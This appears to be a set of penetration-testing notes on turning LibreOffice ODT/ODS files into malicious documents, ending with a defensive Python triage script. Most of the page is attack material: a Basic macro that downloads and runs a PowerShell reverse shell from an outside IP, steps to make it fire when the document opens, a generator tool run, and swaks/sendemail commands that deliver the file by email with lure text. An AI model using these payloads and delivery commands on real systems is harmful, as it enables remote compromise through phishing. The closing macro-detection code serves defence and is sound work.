# .odt

An `ODT (OpenDocument Text)` file is effectively a `ZIP` archive. Unpacking it gives a structure like this:

```bash
content.xml
styles.xml
meta.xml
manifest.xml
Pictures/
Thumbnails/
```

A malicious macro can be placed inside `content.xml` as a `<script:script>` block.

Example: `LibreOffice Basic Macro - Reverse Shell`

```vb
Sub Main
    Shell("cmd /c powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.45.174:8000/Invoke-PowerShellTcp.ps1')")
End Sub
```

```bash
#1. libreoffice -> save as .odt
#2. Tools -> Macros -> Organize Macros -> Basic -> Select a document and create a new one
#3. Write the reverse shell above
#4. Tools -> Customize -> Events -> Open Document -> Macro -> Select the function of the macro you created
```

---

# Malicious ODS, ODT payloads

https://github.com/0bfxgh0st/MMG-LO/

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 mmg-odt.py windows 192.168.45.152 1234
[+] Payload: windows reverse shell
[+] Creating malicious .odt file
Done.
```

Uploading the `.odt` file using [[swaks]]:

```bash
sudo swaks -t mailadmin@localhost --from jonas@localhost --attach @file.ods --server $IP --body "Please check this spreadsheet" --header "Subject: Please check this spreadsheet"
```

---

payload

```vb
Sub Main
    Shell("cmd /c powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.45.174:8000/Invoke-PowerShellTcpEx.ps1')")
End Sub
```

Sendemail

```text
Required:
  -f ADDRESS                from (sender) email address
  * At least one recipient required via -t, -cc, or -bcc
  * Message body required via -m, STDIN, or -o message-file=FILE

Common:
  -t ADDRESS [ADDR ...]     to email address(es)
  -u SUBJECT                message subject
  -m MESSAGE                message body
  -s SERVER[:PORT]          smtp mail relay, default is localhost:25
  -S [SENDMAIL_PATH]        use local sendmail utility (default: /usr/bin/sendmail) instead of network MTA

Optional:
  -a   FILE [FILE ...]      file attachment(s)
  -cc  ADDRESS [ADDR ...]   cc email address(es)
  -bcc ADDRESS [ADDR ...]   bcc email address(es)
  -xu  USERNAME             username for SMTP authentication
  -xp  PASSWORD             password for SMTP authentication
```

```bash
sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s 192.168.184.140:25 -u 'another spreadsheet' -m 'spreadsheet' -a /home/kali/pentestools/windows/clientside/test.ods
```
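Because the document is a ZIP archive, an attachment can be triaged for macros without opening it in an office suite. The following is an added example, not part of the original notes: it lists entries under `Basic/` (where LibreOffice stores embedded Basic libraries), flags `Shell(` calls, and extracts `script:event-listener` bindings from `content.xml` (such as `dom:load`, the Open Document event). The function names and the sample package are constructed for illustration.

```python
import html
import io
import re
import zipfile

MAX_ENTRY = 5 * 1024 * 1024  # skip oversized entries (decompression-bomb guard)
EVENT_RE = re.compile(rb'<script:event-listener\b[^>]*>')
ATTR_RE = re.compile(rb'(script:event-name|xlink:href)="([^"]*)"')
SHELL_RE = re.compile(rb'\bShell\s*\(', re.IGNORECASE)

def triage_odf(data: bytes) -> dict:
    """Report macro indicators in an ODT/ODS package held in memory."""
    report = {"basic_entries": [], "shell_calls": [],
              "event_bindings": [], "script_script": False}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.file_size > MAX_ENTRY or info.is_dir():
                continue
            if info.filename.startswith("Basic/"):
                # Embedded Basic libraries are stored under Basic/<Library>/
                report["basic_entries"].append(info.filename)
                if SHELL_RE.search(z.read(info)):
                    report["shell_calls"].append(info.filename)
            elif info.filename == "content.xml":
                content = z.read(info)
                # Element named in the notes above
                report["script_script"] = b"<script:script" in content
                # Event bindings, e.g. dom:load for "Open Document"
                for tag in EVENT_RE.findall(content):
                    a = {k.decode(): html.unescape(v.decode())
                         for k, v in ATTR_RE.findall(tag)}
                    report["event_bindings"].append(
                        (a.get("script:event-name"), a.get("xlink:href")))
    return report

def build_sample(with_macro: bool = True) -> bytes:
    """Constructed test package; the macro body is a placeholder, not a payload."""
    module = (b'<script:module script:name="Module1">Sub Main\n'
              b'Shell(&quot;PLACEHOLDER&quot;)\nEnd Sub</script:module>')
    listener = (b'<script:event-listener script:event-name="dom:load" xlink:href='
                b'"vnd.sun.star.script:Standard.Module1.Main?language=Basic&amp;location=document"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        body = listener if with_macro else b""
        z.writestr("content.xml", b"<office:text>" + body + b"</office:text>")
        if with_macro:
            z.writestr("Basic/Standard/Module1.xml", module)
    return buf.getvalue()
```

A mail gateway or analyst workstation can call `triage_odf()` on each `.odt`/`.ods` attachment and quarantine anything with a non-empty `basic_entries` or `event_bindings` list.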